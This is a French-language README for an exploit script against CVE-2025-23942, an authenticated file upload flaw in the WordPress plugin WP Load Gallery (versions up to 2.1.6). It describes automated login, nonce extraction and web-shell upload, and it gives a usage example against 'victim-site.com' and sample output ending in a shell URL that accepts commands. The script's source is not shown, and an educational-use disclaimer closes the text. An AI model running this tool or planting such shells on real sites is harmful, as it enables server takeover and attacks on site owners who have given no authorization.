
WP Load Gallery <= 2.1.6 - Authenticated (Author+) Téléchargement arbitraire de fichiers
Vulnérabilité de téléchargement sans restriction de fichier de type dangereux dans NgocCode WP Load Gallery, permettant de téléverser une Web Shell sur un serveur web. Ce problème affecte WP Load Gallery : de n/a jusqu'à 2.1.6.
✅ Exploitation automatisée – Extrait le nonce, se connecte et téléverse le shell automatiquement.
✅ Vérification de version – Confirme si la cible est vulnérable avant l'exploitation.
✅ Gestion des erreurs – Assure une exécution fluide même en cas d'échec.
✅ Gestion de session – Utilise une gestion de session persistante pour l'authentification.
✅ – Fournit une sortie à chaque étape.
requests (pip install requests)Exécutez le script avec les paramètres nécessaires :
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
Exemple :
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Vérification de la version du plugin...
[+] Version détectée : 2.1.6
[+] La cible est vulnérable ! Poursuite de l'exploitation...
[+] Connexion réussie.
[+] Extraction de wplg_nonce...
[+] wplg_nonce extrait : a1b2c3d4e5
[+] Téléversement du shell...
[+] Fichier téléversé avec succès !
[+] Le shell est accessible à l'adresse : http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
Cet exploit est destiné uniquement à des fins éducatives et de recherche en sécurité. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur n'est pas responsable de toute mauvaise utilisation de ce script. ( Khaled_alenazi )